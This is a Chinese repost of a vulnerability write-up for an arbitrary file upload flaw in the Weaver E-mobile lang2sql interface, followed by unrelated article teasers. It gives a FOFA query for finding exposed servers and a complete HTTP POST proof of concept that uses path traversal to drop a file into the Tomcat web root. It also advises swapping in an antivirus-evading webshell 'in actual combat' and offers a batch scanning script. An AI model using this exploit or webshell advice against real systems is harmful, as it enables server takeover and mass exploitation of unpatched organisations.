泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞

news2024/9/27 21:47:11

一、漏洞描述

泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。

e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。该系统存任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马远程控制服务器。

二、网络空间搜索引擎查询

fofa查询

title="移动管理平台-企业管理"

三、漏洞复现

POC

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: ip:port
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 226
Expect: 100-continue
Connection: close

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"

This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--

上传成功后访问

http://ip:port/Check.txt 如下:

实战中将上传内容换成免杀的webshell木马即可

三、漏洞检测

单个检测

python lang2sqlUpload.py -u url

批量检测

python lang2sqlUpload.py -f filename

注微信公众号 网络安全透视镜 回复 20231107 获取批量检测脚本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1181625.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

了解高防服务器的工作原理

在当今互联网时代,网络安全问题日益突出,各种网络攻击层出不穷。为了保护企业的网络安全,高防服务器应运而生。那么,你是否了解高防服务器的工作原理呢?下面就让我们一起来探索一下。 高防服务器是一种能够有效抵御各种网络攻击的…

“小众”与“竞争”:打造爆款新能源车型的两大方法

引言:在动荡的新能源汽车市场中,品牌如何从众多竞争者中脱颖而出,捕捉消费者的心呢?是否是从广袤的"主流"市场着手,还是从具有潜力的”小众"市场切入?或者,是否需要重新定义与既定的竞争者进行正面对抗的方式? 在新能源汽车翻涌的市场潮流中&…

利用浩客无代码开发API集成客服系统,提升用户服务质量

【浩客简介】 浩客,是由十年 SaaS 表单产品「金数据」团队打造的新产品。它主要面向数字化系统的用户评价、反馈、调研、通知工具,特定时机、精准触达,帮助产品经理、用研、UX、运营,聆听用户心声,增强用户触达&#…

【软件设计师 - 一周通关】1.考试介绍

目录 一、简介 考试项目 1、证书作用 (1)以考代评中高级职称 (2)一线城市人才引进落户 (3)就业优势 (4)个税抵扣 (5)技能补贴 2、含金量 3、报名时…

网络原理---拿捏传输层:TCP/UDP协议

文章目录 UDP协议源端口、目的端口UDP长度校验和 TCP协议源端口、目的端口4位首部长度、选项保留位:6位6个特殊标志位32位序号、32位确认序号:在确认应答机制中使用16位窗口大小:在流量控制机制中使用16位校验和 TCP协议 VS UDP协议 在本篇中…

C语言实现利用条件运算符的嵌套来完成此题:学习成绩>=90分的同学用A表示,60-89分之间的用B表示,60分以下的用C表示

完整代码&#xff1a; /*利用条件运算符的嵌套来完成此题&#xff1a;学习成绩>90分的同学用A表示&#xff0c;60-89分之间 的用B表示&#xff0c;60分以下的用C表示*/ #include<stdio.h>int main(){int score;char grade;printf("请输入你的成绩&#xff1a;&q…

【无标题】360压缩软件怎么用?超级好用!

360压缩是一款功能强大的解压缩软件&#xff0c;如何用它压缩文件呢&#xff1f;下面给出了详细的操作步骤。 一、360压缩详细步骤 1、下载软件后&#xff0c;在电脑上右击需要压缩的文件&#xff0c;在弹出的菜单中点击【添加到压缩文件】选项。 2、在360压缩窗口中按需设置相…

建立企业知识库,构建智慧团队

企业知识库的建立对于企业来说非常重要。它可以提高知识的共享和传递&#xff0c;使得员工之间更容易分享和获取信息。通过知识库&#xff0c;员工可以快速找到所需的知识资源&#xff0c;从而增强培训和学习效果。此外&#xff0c;企业知识库还能提升工作效率和团队协作能力。…

实验室通风系统工程-全钢通风柜-实验室废气处理

通风设备&#xff1a; 实验室常用的通风设备主要有&#xff1a;通风柜、原子吸收罩、万向排气罩、桌面式通风罩等。通风柜是安全处理有害、有毒气体或蒸汽的通风设备&#xff0c;作用是用来捕捉、密封和转移污染物以及有害气体&#xff0c;防止其逃逸到实验室内&#xff0c;这…

制药企业如何进行计算机化系统验证(CSV)

在制药行业&#xff0c;计算机化系统验证&#xff08;CSV&#xff09;是确保生产、质量管理和合规要求得到满足的重要步骤。CSV验证确保计算机化系统的可靠性、一致性和合规性&#xff0c;以保护产品质量和患者安全。本文将深入探讨计算机化系统验证的定义、制药企业进行CSV的原…

读完大呼过瘾的计算机书籍

目录 一导论 二《算法导论》 三《深入理解计算机系统》 四《代码大全》 五《设计模式&#xff1a;可复用面向对象软件的基础》 六《人月神话》 七总结 一导论 作为一个计算机专业的爱好者&#xff0c;我发现计算机科学和技术领域充满了无穷无尽的可能性。在探索这个世界…

超详细!DALL · E 文生图模型实践指南

最近需要用到 DALLE的推断功能&#xff0c;在现有开源代码基础上发现还有几个问题需要注意&#xff0c;谨以此篇博客记录之。 我用的源码主要是 https://github.com/borisdayma/dalle-mini 仓库中的Inference pipeline.ipynb 文件。 运行环境&#xff1a;Ubuntu服务器 ⚠️注意…

elementui-plus el-tree组件数据不显示问题解决

当前情况: 显示: 注意看右侧的树是没有文字的,数据已经渲染,个数是对的,但就是没有文字, 解决: 对比以后发现是template中的#default{data}没有写大括号导致的 所以写上大括号后: 正常显示

卷积神经网络中 6 种经典卷积操作

深度学习的模型大致可以分为两类&#xff0c;一类是卷积神经网络&#xff0c;另外一类循环神经网络&#xff0c;在计算机视觉领域应用最多的就是卷积神经网络&#xff08;CNN&#xff09;。CNN在图像分类、对象检测、语义分割等经典的视觉任务中表现出色&#xff0c;因此也早就…

【React-Native开发3D应用】React Native加载GLB格式3D模型并打包至Android手机端

【React-Native开发3D应用】React Native加载GLB格式3D模型并打包至Android手机端 【加载3D模型】**React Native上如何加载glb格式的模型**第零步&#xff0c;选择相关模型第一步&#xff0c;导入相关模型加载库第二步&#xff0c;自定义GLB模型加载钩子第三步&#xff0c;借助…

浅析淘宝为什么会严查套红包行为,如何从技术层面实现红包检测规避

最近不少做淘系电商的商家&#xff0c;遇到了一个普遍的问题就是&#xff1a;订单存在买手套红包导致被平台稽查的情况。这种情况&#xff0c;东哥了解到不是发生在某一两个商家身上&#xff0c;而是一个普遍现象。 下面东哥从为什么会稽查套红包的行为、稽查后会有什么后果、如…

学习使用JS实现Echarts的图表保存为图片功能:saveAsImage和getDataURL

学习使用JS实现Echarts的图表保存为图片功能 接口getDataURL实现思路 需求分析 实际项目开发过程中经常会有图表展示功能&#xff0c;同时为了满足用户需要&#xff0c;会附带着图表导出功能&#xff0c;主要形式就是保存为图片。在Echarts中本身就提供这种配置项&#xff0c;…

期中考试后,如何DIY一个成绩发布系统?

期中考试结束后&#xff0c;对于老师们来说&#xff0c;一项重要的任务就是公布考试成绩。然而&#xff0c;传统的成绩公布方式不仅耗时&#xff0c;而且容易出错。为了提高效率&#xff0c;减少误差&#xff0c;我们可以通过各种代码和Excel来实现一个让学生自助查询成绩的系统…

一物一码需求,标签制作功能轻松解决

许多行业存在为人员、物品、设备等做一物一码标签的需求&#xff0c;可使用草料标签制作功能。直接选择标签样式&#xff0c;填入数据&#xff0c;即可批量生成标签&#xff0c;还可批量排版&#xff0c;更易落地。还可保存标签样式&#xff0c;后续多次复用样式&#xff0c;批…